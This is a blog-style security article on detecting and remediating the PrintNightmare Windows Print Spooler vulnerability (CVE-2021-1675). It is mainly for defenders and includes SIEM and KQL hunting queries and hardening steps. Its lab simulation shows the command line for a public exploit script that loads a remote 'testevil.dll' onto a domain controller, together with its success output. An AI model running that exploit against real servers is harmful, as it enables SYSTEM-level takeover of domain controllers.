Detection & Remediation - PrintNightMare 0-day (CVE-2021-1675)

Detection & Remediation - PrintNightMare 0-day (CVE-2021-1675)

Santhosh Baswa Santhosh Baswa

Santhosh Baswa

Security @ TikTok | PEP - No Sponsorship Required | Leadership | Architect | Speaker | Python | DFIR | Threat Hunting | SIEM | Security Automation (SOAR) | R&D

发布日期: 2021年7月2日
+ 关注

PrintNightMare is a recent 0-day exploit that targets Windows Servers (DC). Threat actors can be able to take over a windows domain server through Windows Print Spooler Vulnerability.

Below information might be useful to CSIRT/SOC teams to take proactive response actions against on "PrintNightMare" exploit.

Attack Simulation:

In default "PrinterSpooler" service enabled in Windows. So, any remote authenticated user can execute code as SYSTEM on the domain controller. 

$r3b00t@peter:python3 CVE-2021-1675.py reboot.labs/[email protected] 
\\test.reboot.labs\sharedrive\testevil.dll'? ? ? ? ? ? ? ? ? ? ? ? ? Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.134[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\test.reboot.labs\sharedrive\testevil.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:192.168.1.134[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\test.reboot.labs\sharedrive\testevil.dll
[*] Stage0: 0
[*] Stage2: 0
[+] Exploit Completed

Disable the "PrinterSpooler" Service

No alt text provided for this image

Trying the same exploit on the server. 

$r3b00t@peter:python3 CVE-2021-1675.py reboot.labs/[email protected] 
\\test.reboot.labs\sharedrive\testevil.dll'? ? ? ? ? ? ? ? ? ? ? ? ? Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.134[\PIPE\spoolss]
[-] Connection Failed.

Blue Team Strategy:

Disable PrintSpooler Service : (Infra Level)

This script STOP and DISABLES Print Spooler service (aka #PrintNightmare) on each server from the list below IF ONLY DEFAULT PRINTERS EXIST

Powershell Script: https://github.com/gtworek/PSBits/blob/master/Misc/StopAndDisableDefaultSpoolers.ps1

Enable PrintSpooler Operation Logs:

$log = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration 

"Microsoft-Windows-PrintService/Operational"

$log.IsEnabled = $true

$log.SaveChanges()

Sysmon Config:

XML Config: https://github.com/LaresLLC/CVE-2021-1675/blob/main/CVE-2021-1675.xml

SIEM: Splunk Query

index=sysmon Image="C:\\Windows\\System32\\spoolsv.exe"?| ?stats values(ImageLoaded),values(TargetObject),values(Details),values(TargetFilename)

Sentinel KQL Query:

let serverlist=DeviceInfo

| where DeviceType != "Workstation"

| distinct DeviceId;

let suspiciousdrivers=DeviceImageLoadEvents

| where DeviceId in (serverlist)

| where FolderPath startswith @"c:\windows\system32\spool\drivers"

| distinct SHA1

| invoke FileProfile(SHA1, 1000)?

| where GlobalPrevalence < 50 and IsRootSignerMicrosoft != 1 and 

SignatureState != "SignedValid";

suspiciousdrivers

| join kind=inner (DeviceImageLoadEvents

| where DeviceId in (serverlist)

| where FolderPath startswith @"c:\windows\system32\spool\drivers") on SHA1

| where InitiatingProcessFileName != "ccmexec.exe"

// Optionally filter for only the print spooler to load the driver to make 

it specific to this attack

//| where InitiatingProcessFileName == "spoolsv.exe"

References: 

[+] https://twitter.com/NathanMcNulty/status/1410289115354914820

[+] https://twitter.com/wdormann/status/1410198834970599425

[+] https://twitter.com/gentilkiwi/status/1410066827590447108

[+] https://twitter.com/cyb3rops/status/1410250996362715137

[+] https://twitter.com/markus_neis/status/1410255678996942854

[+] https://twitter.com/olafhartong/status/1410228896717541378

[+] https://github.com/LaresLLC/CVE-2021-1675

[+] https://github.com/gtworek/PSBits

要查看或添加评论,请登录

Santhosh Baswa的更多文章

社区洞察

其他会员也浏览了